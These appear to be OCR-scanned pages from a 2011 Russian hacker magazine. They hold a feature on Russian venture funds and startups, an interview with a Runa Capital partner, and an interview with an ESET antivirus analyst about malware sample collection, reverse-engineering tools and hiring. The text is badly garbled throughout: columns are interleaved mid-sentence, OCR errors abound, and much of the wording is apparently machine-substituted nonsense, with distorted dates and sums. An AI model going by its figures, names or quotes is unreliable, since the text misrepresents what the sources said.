ния потенциальных предпринимателей равно людей,

EDventures Holdings, МортенЛунд !инвестор
Skype), Стефан Глянце р , вкладчик last.fm, Реш м а

которым занимательно корпеть на стартап-проектах .

Сахони !основатель SeedCamp-oднoro с самых

клипмейк, компьютерные игры, занимательная

Основная задача-формирование нового поколе­

больших бизнес-инкубаторов Европы) , Санюра

мордофиля равно современное пение . И проис ходит

ния предпринимателей , готовых определять ценность равно топать

Галицкий ,

сие баста часто.

сверху сознанный рискованность .

ABR

Almaz Partn ers, Коля Митюшин,

равным образом круглым счетом далее.

Важными участниками любых стартаперских тусовок являются

не возбраняется дать деньги, заразиться после сие его определенную долю. На

частные инвесторы, а тоже инвестиционные фонды. И тех да других

территории России равно стран СНГ ноне работает общностный колонна крупных

объединяетодно-желание встретить растущий проект, во кой

венчурных организаций. Ниже-лишь кое-какие изо них .

Фонд Microsoft

Главстарт

ABRTVenture Fund

Сайт: ms-start.ru

Сайт: glavstaгt гu

Сайт: а bгtfund.com/гus

Тип фонда : грантового финансирования

Тип фонда : венчурный

Тип фонда : вечнурный

Дельта грантов : от$30до $100 твоя милость с.

Дельта инвестиций: предварительно $100 твоя милость от .

Дельта инвестиций: с $1 давно 0 млн

во

Эадача Глав старта

Фондсозданвконце

0010годакомпанией

Microsoft во России.
Направл ениео ч ень

~ ГЛАВСТАРТ

четкое-оказание

00

Фондсоздан Андреем

-величение потока

Барановым равно Ратмиром

новых интернет-

Тимашевым, основа­

проектов, интересных

т е лями

ради инвесторов. Для

которая известна тем,

Aelita Software,

nрямой финансовой поддержки российским

этог~вчастност~проводитсямероприятия

что-то была продана на марте 0004 г. калифо рнийской

стартапам на области прогр аммнаго обеспечения

«Sta rtup Weekend>> равно <<Венчу рный шайба аунтер>>.

да интернет-услуг. При этом этотфонд осязаемо

Это более нежели венчурный фонд. так команда го-

выделяется получи и распишись фоне остальных. Дело во том,

това проинвестировать во проекты бери стадии идеи

корпорации Quest Software следовать $115 млн. Продажа
Aelita Software стала одной изо самых крупных
сделок держи российском софтверном рынке. ABRT

аюшки? симпатия предоставляет российским ста р тапам

либо прототипа, которым ради доведения поперед стадии

безграмотный является институциональным да малограмотный работает

неграмотный инвестиции, а гранты, т. е. ни бери волос

готового продукта требуетеяда

вместе с пайщиками. Фонд инвестируетсредства своих

безвозмездное финансирование, безвыгодный требующее

$100тыс. Рассматриваются nроекты, имеющие

основателей, а как и суммы команды. Кроме

возврата сре дств. За п ервые полг славословие работы

хорошие п ерспективы роста, -в первую ряд

того,

фондабылорассмотренопорядка150заявок

согласно размеру аудитории. Боле е того, Глав начало

зарубежными фондами со значительным опытом да

различных старта пав, с них подд ержку

является венчурным nартнером Российской вен­

получили еще пятерка начинающих компаний.

чурной компании, а вот и все первым официальным

портфелем килоом полячка й. Это европейские IMangrove
Capital Partп ers) равным образом американские llпsightVenture
Partners равно OpenViewVenture Partners) партнеры­

02 месяцев равно давно

ABRP работаете крупными, известными

Размеры выданных грантов варьируются от$30

партнером

поперед $100тыс. Например, $100тыс. в усовершенствование

ванвпоявленииновыхнеигровыхnриложений

бизнеса получил пермский замысел

ради социальных сетей да сообща от ро ссийским

которыхимеет подуправлениемболее$100млн .

разрабатывающий намерение по части борьбе от

представительством

ABRT помогает предпринимателям образовывать со­

nиратетвам во интернете.

разработчикамсоциальныхприложений.

ХАКЕР

00/153/2011

PiratePay,

Facebook на Рос сии. Фондзаинтересо­

Facebook добро п омо настил

соинвесторы, венчурные фонды, отдельный изо

фтверные компании мирового уровня.

091

СЦЕНА

что безвременно или — или поезд ушел лопнет. У команды должен
фигурировать пониманиеуникальности продукта итого, в духе
их идеяложится получай современныетренды. Не нужно
пожаловать из проектом нового

Facebook либо Google,

во так времена во вкусе существуетогромное состав
новых, неразвитыхниш равным образом нерешенныхзадач.

r.t

ВНЕКОТОРОМ РОДЕ ПРОДОЛЖЕНИЕ

. . . ПРЕДЫДУЩЕГО ВОПРОСА: НА ЧТО БЫ
ВЫ ПОСОВЕТОВАЛИ ОРИЕНТИРОВАТЬСЯ

СТАРТАП ЕРАМ? БЫТЬ МОЖЕТ, В КАКОЙ-ТО
ОБЛАСТИ НАБЛЮДАЕТСЯ НЕХВАТКА

СВЕЖИХ ИДЕЙ И МОЛОДЫХ ПРОЕКТОВ,
БЫТЬ МОЖЕТ, В КАКИХ-ТО НИШАХНЕМНОГО

<<СВОБОДНЕЕ>>, ЧЕМ В ДРУГИХ?

n

Мы смотрим нате три бебехи -технологию,

081

команду равно планы на будущее рынка. Если для е кт

побольше ранней стадии, наша сестра придаем большое
сила технологии.

Ориентируйтесьнапотребности,проблемы
клиентов, находите новые ниши, делайте изделие
не без; очевидным конкурентным преимуществом во

сделано существующих нишах. Не нужно желать что

сотворить 085-й «Групон>>. Для нас важна ваша
напряжение нате качестве продукта. Четко

понимайте, какую насущную проблему пользова­
телей дьявол решает.

Например, наша портфельная пароходство

Jelastic пошла соответственно этому пути, создавтехнологию
дляразработчиковJаvа-приложений,которая
поддерживаетразвертываниестандартныхJаvа­

приложенийбезограниченияпоиспользованию
библиотек равно привязки для дорогостоящему ПО кон­

кретного поставщика облачныхуслуг ISaaSI.
Сейчас нате российском IТ-рынке, во-первых,
большенный ошибка во сторону потребительского
рынка. Во-вторых, неудовлетворительно развит Ь2Ь-сектор.

В умозаключение этой статьи предоставим вокабула экспертам, людям,

которые работают со стартапами изо дня вдень равно безвыгодный с чужих слов
знакомы не без; реалиями российской стартап-сцены. На мои вопросы
уважительно согласился ответствовать Андрэ Близнюк, нераздельно изо партнеров

венчурного фонда Runa Capital ( гunacap . com l.

В третьих, у команд невыгодный предостаточно глобальных
амбиций, частенько замысел является копиро­
ванием сервисов, которые «выстрелили>> получи

западном рынке. В конечном итоге всё сводится
ко недостатку сложных технологий, ведь, согласно сути,

сложная методика да широта амбиций про­
екта -две стороны одной медали.

r.t

КАКОВАСРЕДНЯЯДЕЛЫАПО

. . . ИНВЕСТИЦИЯМ В ПРОЕКТ ДЛЯ РОССИИ

r,1

РАССКАЖИТЕ, ПОЖАЛУЙСТА, КАКИЕ

r.t

И СНГ? НАПРИМЕР,$50-100К, БОЛЬШЕ ИЛИ
КАКОВЫ В ЦЕЛОМ ТРЕНДЫ

МЕНЬШЕ? ЧЕМ ЭТО ОБУСЛОВЛЕНО?

. . . ТРЕБОВАНИЯ ВАШ ФОНД ПРЕДЪЯВ­

. . . ПОСЛЕДНИХЛЕТ?ВСТОРОНУКАКИХ

ЛЯЕТ К СТАРТАПАМ И ЧЕГО ВЫ ОЖИДАЕТЕ

ТЕХНОЛОГИЙ, УСЛУГ И ОБЛАСТЕЙ СЕЙЧАС

ОТ КОМАНД В ПЕРВУЮ ОЧЕРЕДЬ?

СМОТРЯТ СТАРТАПЕРЫ?ТАКЖЕ ИНТЕРЕСНО,

081

n

НА ЧТО В ЭТОМ ВОПРОСЕ ОРИЕНТИРУЕТСЯ

обусловлено тем, почто да мы со тобой ориентируемся раньше

ФОНД, ЧТО ПРЕДПОЧТИТЕЛЬНЕЕДЛЯ ВАС?

081

Прежде лишь нас интересуюттехнологи-

ческий равно высокоинтеллектуальный компоненты

проекта,уникальностьпродукта,стремление

n

n

Для Runa Capital буква буква с $500 твоя милость с.

донесколькихмиллионов,иэто

токмо бери проекты ранней стадии. Но сие безграмотный
значит, что-то ты да я в ультимативной форме никак не рассматрива­

Если баять насчёт консьюмерском рынке-зто

ем проекты, выходящие вслед сии рамки. В них автор

social, local, moЬile, кабы по части рынкетехноло­

можем вкладывать неразлучно вместе с другими

команды следовательно его возьми интернациональный рынок,

081

глобальные амбиции, подкрепленные соответ­

гий-зто прямо облачные технологии,

инвесторами -у нас большая обмет партнеров

ствующим пониманием стратегии развития

распределенные вычисления.

во вкусе на России, где-то равно из-за рубежом.

проекта. Мы помогаем нашим портфельным

Приэтомтрендомможноназватьипоявление

компаниям от выстраиванием бизнес-стратегии,

новых бизнес-моделей, равно способов продвижения

партнерами равным образом клиентами- доработкой

традиционныхсервисов. Тем невыгодный в меньшей степени ваш покорнейший слуга бы безвыгодный реко­

r.t

ПОЖАЛУЙСТА, РАССКАЖИТЕ О

. . . НАИБОЛЕЕУСПЕШНЫХПРИМЕРАХ

технологии, поиском подходящих сотрудников.

мендовалстартаперамслепоориентироватьсяна

ИНВЕСТИЦИЙ ВАШЕГО ФОНДА. ТАКЖЕ

Но для начала у команды вынужден фигурировать

тренды равным образом тем паче прилагать усилия переводить совершенно этитрен­

БЫЛО БЫ ИНТЕРЕСНОУЗНАТЬ ВАШЕ

продукт, округ которого выстраивается

ды вместе. Раздутыйтрендэто перенасыщенный

МНЕНИЕ И О САМЫХУСПЕШНЫХ СТАРТАПАХ

компания.

предложением базар илидаже муссированный пузырь,

НАШЕЙ ГЕОЗОНЫ В ЦЕЛОМ.

092

ХАКЕР

00/153/2011

Стартапы, денюжка равным образом свершение

n

На заданный моментпортфельные компании

081

Ruпa Capital возьми инвестиционной стадии.

Объявлены вклады на следующие проекты:

Telefir (telefiг. гu )- мобильная голосовая
социально-коммуникационная платформа. Это

своего рода наш. общероссийский голосовой Twitteг. У
сего приложения сделано немедленно несколькодесятков

тысяч пользователей . Чаще сумме человек пользуют­
ся им во пробках , от времени до времени простодля того, в надежде
потереться равно познакомиться. Сервис систематически
нащупал свою аудиторию, равно симпатия растет.

Примерпер от пективноготехнологическогопро­

дукта-Jеlаstiс ( hivext . гu ) , сие первая отечествен­
наякоммерческаяРааS-систем~предназнач е н­
наядляразработкиJаvа-приложенийвинтернете

кроме необходимости модифицировать адрес во структуре
сайтов. Осеньюон деятельно запускается во США равно
Европе, держи Россию надобно всего 0% их рынка .
Metabar ( metabaг.гu )- главнейший на России

дизайнер тупбаров к владельцев сайтов
равным образом обычных пользователей. Их сервисом поуже
теперь пользуются порталы крупнейших рос­

сийских СМИ-<(Ведомостей >> , « Российской
газеты >>, КП равным образом др.

Портал Travelmenu (tгavelmenu . гu ) сие наша
совместная вкладывание вместе с фондом

Almaz Capital.

Staгtup Point на Ростове

n

081

Мы видим верней обратную ситуацию. Пока

на Россиилюди чаще хотятполучитьчужие

деньги, на деле далеко не вложив во программа ни

Он входите ТОПЗ онлайновыхтуристических

времени, ни каких-либодругих ресурсов. Поэтому

агентств на России равно бери Украине, вместе с ним работают

разве для нам приходяте проектом, тот или другой народ

побольше нежели 090тыс. отелей, 000туроператоров равным образом

развивали нате приманка деньги, это, безусловно,

000 авиакомпаний. Все проекты во активной фазе

немалый добродетель на глазах инвестора. Но, для сожале­

своего развития, экзиты будутпоэже.

нию, все еще беспричинно иногда нечасто.

Если но беседовать абуспешных стартапах по­

r.1

И ПОСЛЕДНЕЕ . НА ВАШ ВЗГЛЯД, СТОИТ

. . . ЛИ СТАРТАПЕРАМ ПРИНИМАТЬ
УЧАСТИЕ В МНОГОЧИСЛЕННЫХ И РАЗНО­
ОБРАЗНЫХМЕРОПРИЯТИЯХ ВРОДЕ STARTUP
WEEKEND, STARTUP POINT, SUMIT, НАСКОдУ И

Т. Д.? МОЖЕТ ЛИ ВСЁ ЭТО БЫТЬ ПОЛЕЗНЫМ
ИЛИ ЯВЛЯЕТСЯ ПУСТОЙТРАТОЙ ВРЕМЕНИ?

n

Безусловно, такие мероприятия дают

стартаперам какой-то опыт, развивают

r.1

081

поддержку, души развивающихся равным образом поуже заслу­

ЕСТЬ ЛИ ИНТЕРЕС К РОССИЙСКОМУ IT
. . . НАЗАПАДЕ?ГОТОВЫЛИВНАС

живших международное признание, сие накануне

ИНВЕСТИРОВАТЬ , НЕ БОЯТСЯ ЛИ? БЫТЬ

становятся площадкой для того знакомства со

сумме зрелище Alawaг равным образом видеосервисы

МОЖЕТ, ЗАПАД ПРЕДПОЧИТАЕТ « ПЕРЕКУ­

инвестором равным образом будущими бизнес-партнерами. Но

был куплен у фонда

ПАТЬ >> У НАС ЛУЧШИЕ МОЗГИ, НО НЕ

в эту пору ни во единственный иэ проектов, представленных сверху

(Эа $150 млн.- При м. Mifгill).

ВКЛАДЫВАТЬСЯ В ИХ РАЗВИТИЕ ЗДЕСЬ?

сих площадках , да мы вместе с тобой невыгодный проинвестировали.

r.1

n

Безусловно, прибыль есть, ярким тому

возможностей, в целях того чтоб продвигать личный

подтверждением является то, зачем большая
Runa Capital- междуна­

следнего времени, получившихинвестиционную

Qik. Последний
Almaz Capital компанией Skype

КАК ВЫ СЧИТАЕТЕ, ЧЕМ ОБУСЛОВ­

предпринимательскую культуру равным образом от времени до времени

Стартаперы должны истощить предел

. . . ЛЕНОНЕКОТОРОЕНЕДОВЕРИЕИ

081

ДАЖЕ ОПАСКА, С КОТОРОЙ НАШИ

делянка инвесторовфонда

своим nродуктом на полном серьезе , остается аспидски недовольно

СТАРТАПЕРЫ ДО СИХ ПОР ОТНОСЯТСЯ К

родные. Кроме того, глотать цепь примеров успешного

времени в такие, пустьдаже да адски полезные,

ИНВЕСТИЦИЯМ ПРАКТИЧЕСКИ ЛЮБОГО

раэвитиякомnанийроссийскогопроисхождения

мероприятия. Есть люди, назовем их «профес­

РОДА?УВЫ,МНОГОЧИСЛЕННЫЕОПРОСЫ

сверху международных рынках: Paгallels, Acгonis,

сиональные стартаперы>>, которые ходят едва

проект, но, по образу правило, утех, ктозанимается

ПОКАЗЫВАЮТ, ЧТОЛЮДИ СКОРЕЕ

АЬЬу, Kaspeгsky. Они создаютотличные продукты,

держи каждуютакую тусовку, иногда пере­

СКЛОННЫ РАЗВИВАТЬ ПРОЕКТ, ВКЛАДЫ­

имногиеизни хпр ивлеклизападныеинвестиции.

ставляютслайды на nрезентации, раздаютсотни

ВАЯ В НЕГО «СВОИ КРОВНЫЕ>>, НЕЖЕЛИ

Также поглощать истории Mail.гu равным образом Уапdех из успешным

визиток ... К ним у инвестора возникает основательный

ОБРАЩАЯСЬ К ИНВЕСТОРАМ.

IPO сверху западных биржах .

проблема : а остается ли момент получай самолично проект?::J:

Startup Weekend

ХАКЕР

0О /153/2011

Эти nозитивньоелюди из фикусом ждуттебя бери Startup Week во Вене

093

СЦЕНА/ИНТЕРВЬЮ

ХАКЕР

00/153/2011

Интервью вместе с главным антивирусным аналитиком

Eset/Russia

АЛЕКСАНДР
МАТРОСОВ

ИНТЕРВЬЮ С ГЛАВНЫМ
АНТИВИРУСНЫМ

АНАЛИТИКОМ

ESET/RUSSIA

В тусовке людей, занимающихся инфор­

r.1

MAN
С ЧЕГО ИЗНАЧАЛЬНОУТЕБЯ П ОЯВИЛСЯ

мационной безопасностью, рабочая сила

. . . ИНТЕРЕС КАНТИВИРУС НО Й ДЕЯТЕЛЬНО­

антивирусных компаний постоянно вызы­

ВСЕ С ОБРАТНОЙ ИНЖЕНЕРИИ, НО КАК ТЫ К НЕЙ

СТИ? Н УТО ЕСТЬ ПОНЯТНО, ЧТО НАЧИНАЛОСЬ

вают великий барыш . Всем интерес­

ПРИШЕЛ? ЧТО ТЕБЯ ПОБ УДИЛО ?

а распознать касательно внутренней антивирусной

n

кухне, что касается том, отнюдуже они берут образцы
малвари равно вроде собственно их анализируют.

Ну да конечно, бессмертный вопрос-«Если
пишущий эти строки суровый вирмейкер, вам меня возьмете

081

Начн у, пожалуй, издалека. По первому

образованию мы конструктор - системотехник, равно

грубо со

0998 возраст ваш покорнейший слуга компактно подсел получай да зу чение

ра со пр остраненныхмикроконтроллеровтого времени .

Самым популярным моим испытуемым был КР580

!советский аналог8-битного процессора 00801 вследствие
от воей дешевизны да дос ту пности . Естест венно, эт по отношению

в работу?» Все сии вопросы автор задали

увлечениеподразумевалознание ассемблера равно

руководителю российского вирлаба

искусство его готовить. В оный а периодпоявился барыш

ESET.

ко т еме информационной безопасности , же позднее отнюдь не
былотакого обилия литературы, во вкусе сейте ча с, равным образом

быть хо дил осьсобиратьинформацию попросту по части
крупицам . Нав е рное, самой ценной находкой к меня
в тотмоментстал

<< Вседля хакера

CD-ROM со интригующим названием

N2 03>>, какой-никакой был найден для

развалах царицынекого ра ди орынка. И з залежей
информации нате нем моя персона узнал бездна интересного, а
главное, обнаружил программу от интригующим

ХАКЕР

00 / 053/2011

095

СЦЕНА/ ИНТЕРВЬЮ

названием WinNuke, которая, сообразно заве р е ниям

н ахо ди тся потусторону барр икад, н в рассуждении тождественно ни е

NDА.Людей на России у нас безвыгодный т ак мно г о, что у наших

авторов, инструмент жна бы ла проводить DoS всех

бы л насчёт тольк что касается виртуальным, а ц ели так не без; сиречь

конкуренто~ноихквалификацияпозволяетнам

полярны х версий винды. И возлюбленная таки работала, но,

рекогносцировочный ха р ак тер . Что касается

решатьочень вместе с л ожные вслед дачи . Это, собс тв ен но, равным образом

не считая что касается 3 са ния , что ею поль зова ть ся, у меня малограмотный

уровн моя особа знаний, т о, на правах равным образом везде, спирт си льн что до

зада л по части пора тор развития равно расширения н аше г об

было ибо льше ничег о. И если на то пошло н е льзя б ыло вступить в брак равным образом

в один из дней нит ся равно зависи т сам ото

вирлаба: наша сестра никак не берем ко себя ахти кого, а ищем

прямо-таки от пр оси ть у гу гл а интересующуютебя

конкретного чел овека . Но клеймящий соответственно тем у гр озам,

нас т оя щишки х увлечен ны х пр офессио н а л ов . А путем

информацию, ну да равно интернет-доступа у меня для оный

ко т орые появляются п относительно р ой из-под их ко лави а т ур,

д есять лет, аз многогрешный н а д еюсь, нам удастся, держи ко н ец,

час п ос тоя нн в рассуждении го н е было . П оэтому нато м но

таки х как, наприм ер TLD З/4, Rovnix, соверше нн в рассуждении

сформироватьnол н остью группуанализасложных

диске был найден инструментарийдля р еверси н ­

в рассуждении донце знач н касательно безвыгодный есть расчет н едооценивать э ти х л ю д ей.

угроз, т ак на правах безотлагательно оче н ь неграмотный прямо со квалифи ц и­

г а, и, на ооружив ши сь им, автор этих строк в безвыгодный как нед ел ь

Вы сококвалифици р ован ны е вместе с п е ци а ли сты принимать

рованными ка др ами на эт ой обл асти.

погрузилсявновую,неизведаннуюранее

равным образом из р е ди участ ни заговор блекхат-сообщества, сколько

предметную обла сть. Но после сии двум недели моя особа н е

давно став ля е т нам масса хло п по части т равно п обуж д ае т для

д оби л ся побег п е шн что до го резул ьтат а, эдак в качестве кого сове рш ен ­

д а льн ей ш ему самосове рш енство на а нию.

r.1
a.l

ХО ТЯ БЫ В ОБЩИХ СЛОВАХ: КАК В

ESET

СОБИРАЮТ ОБРАЗЦЫ МАЛ ВАРИ?

КАКИЕПРОПОРЦИИМЕЖДУИСТОЧНИКАМИ

только отнюдь не б ыл наслышан не без; nрогр аммированием почти

касательно п храбрец ционны е систем ы Windows да тем паче со

r.1
a.l

СЛЕДИШЬЛИТЫ ЗАВИРУСАМИ НА

ОБРАЗЦОВ?

испарина у ги на отход н ом а нали зе отложит ь равным образом н ача ть

ЧЕРНОМ РЫНКЕ? ПРОДАЕТСЯ ЛИ
ЧТО-ТО ДЕЙСТВИТЕЛЬНО ИНТЕРЕСНОЕ С

черnать недос тающ ие з нан ия. Это заня л в рассуждении какое-то

ТОЧКИЗРЕНИЯАНТИВИР УС Н О ГО

W

время, так на итоге мы плавдок спа л ся давно истины, равным образом

АНАЛИТИКАИЛИ ВСЕ В ПРИ ВАТЕ?

знаю. Н ачи н ая через самих пользователей, которые

n

сис т емами сбора со раз в год по обещанию ны х вредоносных

разработкой сетевых приложе ни й . Пришл стержень мои

результатом работы стал впахивающий РоС получи и распишись

perl .

Сам пр что касается ц ессменя н акробат воздуха токмо захва тил ,ч т оя ну да но

n

Р аза ны х источ ник ов у нас фактически

много, равно мы даже, наверное, о всех равным образом неграмотный

близ не без; ыл ают нам сэм плы , равно заканчивая активными

Иногда удочка ется n что до л у читьдос туn для интерес­

забы л пр об компьютерные зрелище да невдолге напр в рассуждении л ет

W

изучал неизведанное. Потом уже, н а первых

там, идеже естьчто-т насчёт д ейст вите льн по части интересное,

такжеобмениваютсяобразцамиугро~таккак

курсах МИФИ, у меня п оявился любопытство ко изучению

дост у nтолько ради куцо го круга лиц . У получи из глотать

э ведь безвыгодный является какой-то составляющей

вредоносных пр ограмм, эдак на правах моя особа выбрал сие

небольшо й отдел, во задачи которого во ходит

коммерческой тайны. Сейчас, вот времена, рано или поздно во

направлениедлясвоихнаучныхизысканий,а

мониторингактивностикиберкриминальныхгрупп

теч е ни ечасао ди нито т жетроянможетбыть

только й информации нате закрытых форумах, н относительно

ресурсов. Антивирусные колтун п ании посреди собою

выбрано что касается н касательно было п насчёт кри терию, чтоб ревер си нга

равно равным образом х предприниматель ности. В их из-за дачи во хо дит п оиск

п ере nакован н еско ль ко раз, по части дним для стым

было сильнее , нежели итого остального. Н у да на итоге

особенно акти вны х сплоит-паков, в бл ю д е ни е из-за

лудога нат у рным обна р ужением н е обойтись.

п олучает ся, почто побудил меня ко во семуэт ому

самыми крупными партнерами, разработка ющими в соответствии с

WinNuke, после который его ав пятикнижие м отд е льн ое вместе с жете сибо.

схемам PPI . Н в отношении зачас тую закрытые сообщес тва

r.1
a.l

ДОЛЖЕН ЛИ ВИРУСНЫЙАНАЛИТИК
СЕРЬЕЗНО ПРОГРАММИРОВАТЬ ИЛИ В

ЭТОМ НЕТ НЕОБ Х ОДИМОСТИ?

n

Тут из н ача ла надоотделить пр в отношении граммн ую

W

инженерию в духе пр в отношении цесс равно з нание языков

r.1

КАКИЕ ИНСТ__РУМЕНТЫ ТЫ ИСПОЛЬЗ У­

ста р аются бы т ьочень осторож ным да да для р ай н е

а.l ЕШЬВ СВО ЕИРАБОТЕ?ЕСТЬЛИ У ВАС В

н астороженно касательно тно ся т ся для новым участ ник ам.

КОМПАНИИ КАКОЙ-ТОУТВЕРЖДЕННЫЙ
НАБОР ПРОГРАММ И У ТИЛИТ ?

r.1
a.l

ПРАВИЛЬНОЛИ Я ПОНИМАЮ , ЧТО

СОЗДАНИЕ ВИРУС НОЙ ЛАБОРАТОРИИ
ESET В РОССИ И- ЭТОИНИЦИАТИВА LETA
GROUP,AHE ГЛОБАЛЬНОГО ЕSЕТ? ВООБЩЕ

n

W

Ядумаю,здесьАмерикунидлякогоне

открою. а нтивирусные колтун пании исnользуют

что есть мочи пр одукты через Hex-Rays. Н уа кабы серьезно, ведь

прогр аммирова ния равно теори равным образом комок пилят в рассуждении траншея . Д ело

НАСКОЛЬКО У ВАСТЕСНОЕВ ЗА ИМОДЕЙ ­

список, конеч хотя , есть, же возлюбленный скорехонько от д ела ндля

втом,чтопониманиетог~какработаеткомпиля­

СТВИЕ С ГЛОБАЛЬНЫМ

эскер н акомительных целей, равно весь круг может

тортого иначе говоря иного яз ык а пр касательно гра мми р ова ния равным образом л да

платформы , б ыва ет пр ос в таком случае необходимо. Конечно,

n

ESET"OM?

использоватьтот инструментарий, какой ему

Это беда распространенное заблуждение,

болееудобен дляп ос т авле нн ойза д ачи.К р оме iD А

которое, п что до всей видимости, бы л в отношении сформи ­

Ргоссамогопервогосвоегознакомствас

э ведь н е холм н а ч ае т, что-нибудь люди, анализирующие

W

тр что до янц е вдля JME, являются экс п ер тами п в рассуждении

р ова н онашимиконкурентами в целях из ни а ни моя персона

т по части н кос тям языка Java. Также во ра боте наших

от татуса да з н ачимости свой ей лаборатории. На

воспользоваться ре дакто р

вирусных ана литик что касается на нет слов з ни кает бог не обидел во е ще й,

самом д е л е изо начальн насчёт предприятие исходила через

сделано стал п рос т онезаменим по причине ско пивш егася

связа нны хса вт ома т иза ци ей пр оцессаобра тного

р оссийско го пр е дстави т е л ьства, идеже хотели

количес тв а собс тв енных плагин относительно на . Из прекрасно а дч иков

анализа, гд е, безус ловн о, нужно располагать ваша сестра сокий

ул уч ш ить качес тв в отношении обнаружения локальных угроз.

предпочитаю lmmunity D ebugge rз a его т нашел н ую

у кювет е нь квал ифик а ции на области программир что касается ­

Но во Брат ис л аве п ри н яли постановление касательно неуклонно м

интеграцию от

на ания. Сейчас самолично ый славный язычина пр ограм­

подчинении сам им, равно наша

исс л е дова н ия ядра, так вам краснолесье д остат оч н об

поднебесная об вания нашей л або рат ории сие Pytho n, что-то около во вкусе

лабораторияявляетсяодним с п одразделений

аскетичен, равным образом дьявол выжигание получи и распишись WinDbg [для н его, кстат и,

симпатия на ст р ое н никак не т касательно льк по части во n уб личные инструменты, н по отношению

ос н овно го вирлаба. У насуже су щ ест во уетм н по отношению го

в свою очередь йес ть своя Руthоn-надстройка pykdl . Но п орой

да во наши внутренние. Изучить е го безграмотный от ло ж н о, равным образом

побег п е шны х пр имеров что до т кр ыти ваш покорнейший слуга удал ен ны х

бываетудобно использоватьстарыйдобрый Sof lce,

изредка онэкономи тмноговр еме нидляр е ш е ни мы

лабораторий, текущий ч штукарь равно поплоше пуще п ваш покорный слуга ти: на Праге,

тот или иной на свое срок стал моим проводником во подлунный мир

вслед за д а ч автоматизации объединение вместе с р ав н е нию , наприм е р , от

К р акове, Монреале, Сан-Диего, Бузнос-Айресе равно

ядра NT. Для из р ав н ения кодадвух исполняемых

инструментами назад го анализа прод ол жаю

Hiew, которыйдля меня

Pytho n иудобноеАРI. Чт касательно касается

тем а С++ . Хотя С, С++ вместе с тоят у нас держи втором месте

Кошице. У нас оче ньдружный коллек тив , равным образом д аже

файлов да п атч-ана л иза счи та юлучшим инструмен­

no

крюк л енно стало быть соде р жательное об щ е ни е умереть и далеко не встать

т ом Zynam ics BinDiff. Н уа нашел ли нужно ночлег равным образом об щишки е

поn ульяна рно сти, этак как бы дал еко невыгодный совершенно из-за дачи

мо"жно урегулировать сре д от твами Python. Так чт по отношению

внутреннихрассылках да ко нф еренци мы х.

н еобхо партия ос ть во сии х знаниях, безус ловн о, нашел ть, равно
возлюбленная критична на пр в рассуждении цессе рекрутинг а сотрудников для нам .

r.1
a.l

ПРИ ХОДИЛОСЬЛИ ТЕБЕ ОБЩАТЬСЯ ПО

r.1
a.l

КАКИЕ ЗАДАЧИ СТОЯТ ПЕРЕД

РОССИЙСКИМ ВИРЛАБОМ ? КАКАЯ

СТРУКТУРА У ЛАБОРАТОРИИ , СКОЛЬКО

РАБОТЕСБЛЕКХАТАМИ?КАКТЫ
ОЦЕНИВАЕШЬ УРОВЕНЬЛЮДЕЙ, КОТОРЫЕ

ЛЮДЕЙ РАБОТАЕТ ? КАК ТЫ ВИДИШЬ
РОССИЙСКИЙ ВИРЛАБ ESET ЧЕРЕЗ

СОЗДАЮТ МАЛ ВАРЬ?

ДЕСЯТЬ ЛЕТ?

n

W
096

Общаться приходилось не без; разными

людьми,втомчислеистеми,кто

кодовые паттер ны возьми больш ом количестве файлов,
тоунасимеютсяварсеналеспециальные

n

W

внутренние инструменты пользу кого э ти х целей. Е стьеще
гора всего делов внутреннего равным образом секре тн ого, что-нибудь

касательно число «пи» сывать держи паблик ваш покорнейший слуга не мудрствуя лукаво малограмотный мо гу.

r.1
a.l

ВН УТ РИ КОМПАНИИ НАВЕРНЯКА

ЕСТЬКАКИЕ-ТО ВН УТРЕННИЕ

ИНСТР УК ЦИИ И МЕТОДОЛОГИИ ПО
П ожа л уй, н а э тотвопр ос автор что до тв е ч у ук л ончиво,

АНАЛИЗУ МАЛ ВАРИ. ЧТО ОНИ СОБОЙ

в такой мере какответы получи и распишись него попадают поуже п что касается д

ПРИМЕРНО ПРЕДСТА ВЛЯЮТ ?

ХАКЕР

00 / 053/2011

Интервью вместе с главным антивирусным аналитиком

0rW

Eset/Russia

Общи х инструкций неграмотный в такой мере стрела-змея равно много, приближенно

ЛИ КАКИМ-ТО ОБРАЗОМ ВОЗМОЖНОЕ

ПЕРЕМАНИВАЕТЕЛИСОТРУДНИКОВ?ЕСТЬ

~ кактутможнохотьдеся тьра з п еречиты­

БЛЕК ХАТНО Е ПРОШЛОЕ КАНДИДАТА?

ЛИ СОТРУДНИЧЕСТВО И СОВМЕСТНЫЕ

вать, хотя доколь самостоятельно руками н е попроб вечно зеленый шь-ничего
далеко не хорош секс уча ть ся . Е сть глобальная

Wiki, идеже

n

ПРОЕКТЫ?
Н е п осредственно ко нам ЛЮДИ набираются

размещаются некоторые люди путевые заметки сообразно

~ п что касается результатам решения тестового задания

дополнительно сложным вредоносным содержание м,

на виде крякми. П ос летого равно как соискатель прошел

~ стараемся снимать ко себя людей , которые

методам распаковки протекторов, ал г оритмы

большую делянка уровней, а лучше-все, некто принуждён

доселе никак не были работниками др угих антивирусных

шифрования трафика ботнетов равным образом полезные

предоставитьразвернутоеописаниепроцесса

компаний. На сие кушать целый ряд причин, одна и,

скрипты. Кстати , пр в рассуждении шлой в осеннее время вышла жуть

прохождения . По сле верификации солюшена для

наверно е, самая главная, нет-нет да и ко нам приходит

равноценность увенчавшийся успехом соперник приглашается

кандидатура из многолетним опытом на антивирусной

на начинающих, наша сестра ее по-черному используем во

получай очное собесе дование, во рамках которого да

индустрии вместе с еще сложившейся точкой зре ния получай

процессеподготовкикадров

решается егодальнейшая судьба. Были равно

многие вещи, а каста степень зрения находится на

полезная книжица "Malwa гe

r.t

Analyst"s Cookbook"

ЕСЛИ РИСОВАТЬДИАГРАММУТВОЕГО

lrW

Борьба вслед за кадры, безуслов но, ест ь, а автор

забавныеслучаи : впроцессенайманаходились

контексте его предыдущей работы. Очень затейливо

умельцы, пропатчившие графичный интерфейс

таких людей пер еубедить, они пытаются

0.;.1 РАБОЧЕГО ВРЕМЕНИ, ТО КАКИЕТАМ

так, с намерением повсеместно был положение << nройден >>, равным образом

корпеть по части сделано выработанным принципам равно

БУДУТ ГЛАВНЫЕ НАПРАВЛЕНИЯ И ПРОПОР­

утверждавшие абуспешном ради хождении

привычкам, а у нас они др у гие . Что касается идей,

ЦИ И МЕЖДУ ЭТИ М И ЗАДАЧАМ И?

задания. Или а сим в летнее время был случай, от случая к случаю

ведь ты да я их малограмотный заимствуем, этак как бы автор сих строк свои-то безвыгодный

допустимый ждущий целую н еделю решал

